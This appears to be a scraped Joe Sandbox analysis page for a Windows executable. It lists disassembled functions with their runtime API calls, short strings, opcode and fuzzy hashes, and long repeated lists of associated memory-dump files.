Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: H_prolog3_memset
String ID: l G
API String ID: 2828583354-3283098567
Opcode ID: 467dc12daf057226a4a8045340510763c513e065e825ee658eb2bcc426c95710
Instruction ID: 019c73cef9915ccba8888541b9280d6abf430617a06f231172daa405a2a23ea0
Opcode Fuzzy Hash: 467dc12daf057226a4a8045340510763c513e065e825ee658eb2bcc426c95710
Instruction Fuzzy Hash: 323180B0901B40CFD320DF2A854578AFAE4BFA5308F40890FD1AE97261D7B86148CF69

Function 00450D60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00413DBC: __EH_prolog3.LIBCMT ref: 00413DC3
Part of subcall function 00413DBC: GetWindowTextW.USER32(?,?,?), ref: 00413DD9

_memset.LIBCMT ref: 00450DA5
GetOpenFileNameW.COMDLG32(?), ref: 00450E0D

Part of subcall function 0041375B: IsWindow.USER32(?), ref: 0041376F

Strings

L, xrefs: 00450DAD

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$FileH_prolog3NameOpenText_memset
String ID: L
API String ID: 102439242-2909332022
Opcode ID: 7d410dffe41b9c87c23ad0bfaeb01e8f96a8182c8c94c5c6ebeb8cf7576b1010
Instruction ID: 4ab5c319280afb25efe77bb6fac84213f3d8586f119fac3221d3201d2f259b81
Opcode Fuzzy Hash: 7d410dffe41b9c87c23ad0bfaeb01e8f96a8182c8c94c5c6ebeb8cf7576b1010
Instruction Fuzzy Hash: 9811B870A0021CDBCB66DF55DC55FD9B7B4BB0C304F4041E9A68DA6241DBB866C88F59

Function 00416372 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 0041639A
PathFindExtensionW.SHLWAPI(?), ref: 004163B0

Part of subcall function 00416101: __EH_prolog3_GS.LIBCMT ref: 0041610B
Part of subcall function 00416101: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,004163D9,?,?), ref: 0041613B
Part of subcall function 00416101: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0041614F
Part of subcall function 00416101: ConvertDefaultLocale.KERNEL32(?), ref: 0041618B
Part of subcall function 00416101: ConvertDefaultLocale.KERNEL32(?), ref: 00416199
Part of subcall function 00416101: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004161B6
Part of subcall function 00416101: ConvertDefaultLocale.KERNEL32(?), ref: 004161E1
Part of subcall function 00416101: ConvertDefaultLocale.KERNEL32(000003FF), ref: 004161EA
Part of subcall function 00416101: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004162A1

Strings

%s%s.dll, xrefs: 004163BB

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 280528ebb89ea39cbbc6a6c324a814f2d8881e77391d00b974ec165bb7195e21
Instruction ID: 023b42f15e08b80b31a62ac1965e21f6fe8d156dd6c8a69f0be6b56758639a5a
Opcode Fuzzy Hash: 280528ebb89ea39cbbc6a6c324a814f2d8881e77391d00b974ec165bb7195e21
Instruction Fuzzy Hash: 5101A771A14118ABCB00EB65EC459EF77ECAF48300F4100BAA805D7151EA74DA458B58

Function 004506E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004506FA
GetClassNameW.USER32(?,?,00000010), ref: 00450715

Strings

#32770, xrefs: 00450726

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ClassNameVisibleWindow
String ID: #32770
API String ID: 3344838419-463685578
Opcode ID: ff1e381345264cfbae58243c7c6bae0c1e7403520453264b74676a066b0ac0c0
Instruction ID: 329dd7405a65580469dac28e3f34989623650883d06c803dbaf598e334343dd7
Opcode Fuzzy Hash: ff1e381345264cfbae58243c7c6bae0c1e7403520453264b74676a066b0ac0c0
Instruction Fuzzy Hash: B8014478B04208ABCB04DF65D881BDE7BE4AB0C301F40852AFD05D7241F778E9849F99

Function 00430EB7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

rBG, xrefs: 00430EDB

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID:
String ID: rBG
API String ID: 0-2193857688
Opcode ID: a994b2fa993a532dcd52cb3985d80afa5a4b5991a66b13e736bbb8ad10cb48b6
Instruction ID: 8d6343dbd45eb7de539f9396a7324dfea31de9f7ce279ab3ffdbddff99d100ac
Opcode Fuzzy Hash: a994b2fa993a532dcd52cb3985d80afa5a4b5991a66b13e736bbb8ad10cb48b6
Instruction Fuzzy Hash: 99F0C871600118BACF11AF51DC12BB937A4DB08748F10893BFE05D91D1E6B5CA90D798

Function 00432788 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042A134: __getptd.LIBCMT ref: 0042A13A
Part of subcall function 0042A134: __getptd.LIBCMT ref: 0042A14A

__getptd.LIBCMT ref: 00432797

Part of subcall function 0042DD57: __getptd_noexit.LIBCMT ref: 0042DD5A
Part of subcall function 0042DD57: __amsg_exit.LIBCMT ref: 0042DD67

__getptd.LIBCMT ref: 004327A5

Strings

csm, xrefs: 004327B3

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 75e282eb6276abafed4b3134921df75a10de83e3b49dcc4c80afb57859b4a9e5
Instruction ID: a2d615dcc5367aef083f88861266cafb52aada873923d5b1058c4ab8a2368921
Opcode Fuzzy Hash: 75e282eb6276abafed4b3134921df75a10de83e3b49dcc4c80afb57859b4a9e5
Instruction Fuzzy Hash: 1201AD34800305ABCF349F21D544AAEB3B4BF18325F64242FE44156B91CBB88990DF5A

Function 004110C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004110C8

Strings

8I, xrefs: 004110E2
I, xrefs: 004110F2

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
